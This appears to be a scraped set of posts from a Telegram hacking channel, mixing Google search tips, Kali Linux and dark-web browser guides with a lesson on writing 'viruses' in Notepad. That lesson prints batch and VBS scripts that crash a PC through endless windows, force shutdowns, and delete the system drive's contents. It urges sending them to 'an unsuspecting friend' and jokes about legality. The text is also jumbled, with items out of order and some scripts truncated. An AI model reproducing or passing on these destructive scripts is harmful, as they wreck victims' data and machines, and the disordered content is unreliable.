Tech tricks, news, hacking tutorials and dark web guides. Admin : @anonyguy
Tob - Secure Browser
Tob is a free, open-source and ad-less web browser that uses Tor to protect your privacy.
- Anonymously browse the internet without websites knowing your real IP address.- Navigate the internet without your ISP tracking you.
- Access .onion websites ("hidden services" only available with Tor)
- Change IP address, clear cookies and cache with the press of a button.
- Disable scripts that could be used to track your network activity
Download Tob
For our new members, here are some of our best tutorials you might have missed!
How to Send any File on WhatsApp
How to Set Screen Lock Pattern on Windows PC
How to Fix “App Not Installed” Error
How to Make Clothes See-through in Photoshop
How to Hack Facebook 1. Credentials Harvester Attack
How to Hack WiFi 1. Aircrack-ng
How to Hack Facebook 2. Phishing
How to Jailbreak an iPhone/Pod/Pad
How to Access the Dark Web 1. Tor
How to Access the Dark Web 2. Orfox on Android
How to Access the Dark Web 2.1. Fire.onion on Android
How to View Stored Passwords 1. in Firefox
How to Write Computer Viruses 1. using Notepad
How to Install Kali Linux 2.0
How to Get the Most out of Google Search
🔟Translate any Website
Want to visit a website but it's in a language you don't understand? Just add the link you wanna visit at the end of the Google Translate URL.
^^Replace "en" with an abbreviation of the language you want to translate the site into (example: ru for Russian, sw for Swahili, ir for Persian...)
^^Replace "" with the website you want to translate.
As a bonus, this also helps you access blocked websites at school or work by bypassing proxies, the way VPN apps work.
8⃣Find Free Downloads of Any Type
Ever needed an Android app but couldn't find the apk for it? Or wanted an MP3 but couldn't find the right version?
Google has a few tools that, when used together, can unlock a plethora of downloads: inurl, intitle and filetype… Example, to find free Android apks, you'd search for
-inurl:htm -inurl:html filetype:apk intitle:"index of" apk
or just
intitle:"index of" apk
6⃣Find Artist Works
Searching "[artist] works" brings up an instant list of works by that artist. Ex: "G Easy songs"
4⃣Instant Dictionary
Search "define:[search term]". Google will give you an instant definition of your search term, along with synonyms and translations.
2⃣Global Time
Typing "time [city/country]" will return the current time in the place you looked. Useful when you want to travel to somewhere in a different time zone.
Getting the Most out of Google Search
</lesson_001.0:> Search Shortcuts
Tired of typing many words and scrolling lots of pages on Google to find what you were looking for?
These simple search shortcuts and parameters will help you spend less time on Google, but make the most of it.
Install Kali 2.0
Virtual Machine:
4⃣Open Infinite cmd.exe windows to crash PC
Type this in Notepad.
@echo off
goto top
Save it as FileName.bat
2⃣Convey your friend a little message and shut down his / her computer:
Type this code:
@echo off
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s
Save it as FileName.vbs and send it. Make sure they open the file for it to work.
Writing a Computer Virus
</lesson_001:> ...using Notepad
Ever wanted to code a virus? Even just a simple one? I'm going to show you how to write some
Most of us are new at coding so I'm just gonna start with the basic simple ones.
All you need to have is your Windows 7/8/10 PC and a text editor, I prefer to use Notepad since it's preinstalled.
3⃣This screen pops up and you can see all the passwords that were used to sign in to a website.
@TechByte | @RLchannels
Accessing the Dark Web
</lesson_003:> ...on iOS
We looked at the different ways to access the dark web using Tor networking on PC and Android, which left some iOS users feeling alone and lost.
Worry no more, because, as I mentioned earlier, there are plenty of ways you can surf the dark web on your iDevice. We'll just look at one of the ways – using Tob Browser. This is because Tob is free, 😏duh!, and it's my personal favorite.
#DarkWeb #iOS
11. Precise Time-Based Search Results
You're probably seen the option on Google that lets you filter results by time, such as past hour, day or week. But, of you want to be more specific – like in the past 10 minutes, you can do it with a URL tweak. Add &tbs=qdr: to the end of the URL, along with the time (h5 for 5 hours, n5 for 5 minutes, s5 for 5 seconds). To search the past 10 minutes, you'd add &tbs=qdr:n10 to your URL. It's handy for getting the most up-to-the-minute results.
12. Convert Units of Measure
To convert metrical units, just type [number][unit] to [unit]
Ex: "5 ounces to grams"
It also works in converting digital size. Ex: "5MB to KB"
13. Convert Currency
If you want to convert currency, just type [number][currency] to [currency]
Ex: "USD to Yen" to convert US dollars to Japanese Yen or "BTC to USD" to covert bitcoin to US dollars
9⃣Google Cache
Google has a cache of almost every popular website. If you want to find it, just type cache: before the site's URL. This is also useful for finding old versions of the site or accessing sites that are down.
7⃣Search within a Website
If you really love a website but its search tool isn't that great, Google can search it for you.
Just use the site: parameter. Type
site:url [search term]
Example: " Nexus 5X"
5⃣Quick Directions
Type [current location] to [location] and Google Maps brings up the directions, quickest route, drive time and distance between the locations.
Type any mathematical calculation. You can also search "calculator" and the calculator pops up.
1⃣Weather Forecast
Typing "weather [city]" returns the current weather in the city mentioned, with a 5-day forecast
Kali Linux 2017.1 | 64-bit
Latest Stable Release
There's how to install Kali Linux on a Windows PC.
To download Kali, go to and choose a version matching your device specifications. Alternatively, you can download the Light version right here, in this channel. I couldn't upload the other versions because they are all over 2GB in size, which exceeds Telegram's 1.5GB file size limit.
After downloading and installing Kali, you can go to to find your way around the terminal, I'll keep sharing Kali tutorials here, so stay tuned.
I've got lots of messages about what the commands in the codes mean, so let's use virus 4 to explain them.
@echo - This will display anything in the command prompt (cmd) shell, if we set this as off(as in "@echo off), nothing in the rest of the code will be seen in the cmd shell.
:top - This will be our starting point of our loop.
start - This opens one cmd window
goto - This will make the scipt (or virus) go to any text within the code. [Example; "goto top" will go to the point with ":top" and start from there].
So according to this, the script will force the system to open a blank cmd window, then another, and another...untill the system runs out of RAM.
To get out of this loop, simply reboot your PC, since you can't do it by pointing the mouse (because your PC will be hanging like heck by then), you'll be forced to shutdown by pressing the physical power button on your PC.
3⃣This virus deletes the Contents of a Drive
Type this in Notepad:
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
Save the above code as "FileName.bat"
@TechByte | @GEEKernel
1⃣Continually pop out your friend’s CD Drive. If they have more than one, it pops out all of them!
Copy and type this Code in Notepad:
Set oWMP = CreateObject(“WMPlayer.OCX.”)
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count>= 1 then
For i = 0 to colCDROMs.Count– 1
For i = 0 to colCDROMs.Count– 1
End If
Save it as “FileName.vbs” and send it to an unsuspecting friend.
Remember, this may be considered rude, or creepy and illegal in most places, and if you get caught, you may be fined or punished, but...
...who cares, right? It's definitely worth it! I'm kidding, I'm letting you know this for educational purposes, what you choose to do with this knowledge is up to you.
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2⃣Head over to the Security tab and click Saved Passwords... or simply press P
@TechByte | @RLchannels